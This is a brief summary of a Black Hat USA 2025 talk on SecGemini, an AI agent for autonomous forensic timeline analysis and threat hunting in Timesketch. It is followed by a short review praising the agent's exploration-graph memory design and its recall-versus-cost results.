Autonomous Timeline Analysis and Threat Hunting: An AI Agent for Timesketch
Black Hat USA 2025 · Day 1 · Briefings
Google engineers Maarten van Dantzig and Alex present SecGemini, an AI agent that autonomously performs digital forensics and incident response across hundreds of millions of log records — finding 53% of critical attack indicators in the hinted (timeline reconstruction) mode and 47% in the unhinted (threat hunting) mode, for under $3 per investigation. The agent avoids the context-window limitations of naive LLM approaches by maintaining an "exploration graph" as structured memory, enabling multi-step reasoning across massive datasets without losing track of what it has learned. ---
AI review
The exploration graph is the right architectural answer to the context-window problem in DFIR — externalized structured memory that lets the LLM process one step at a time without degradation. 53% recall on critical indicators at under three dollars a case isn't perfect, but it's operationally real, and the auditability design shows these people understand what actual analysts need.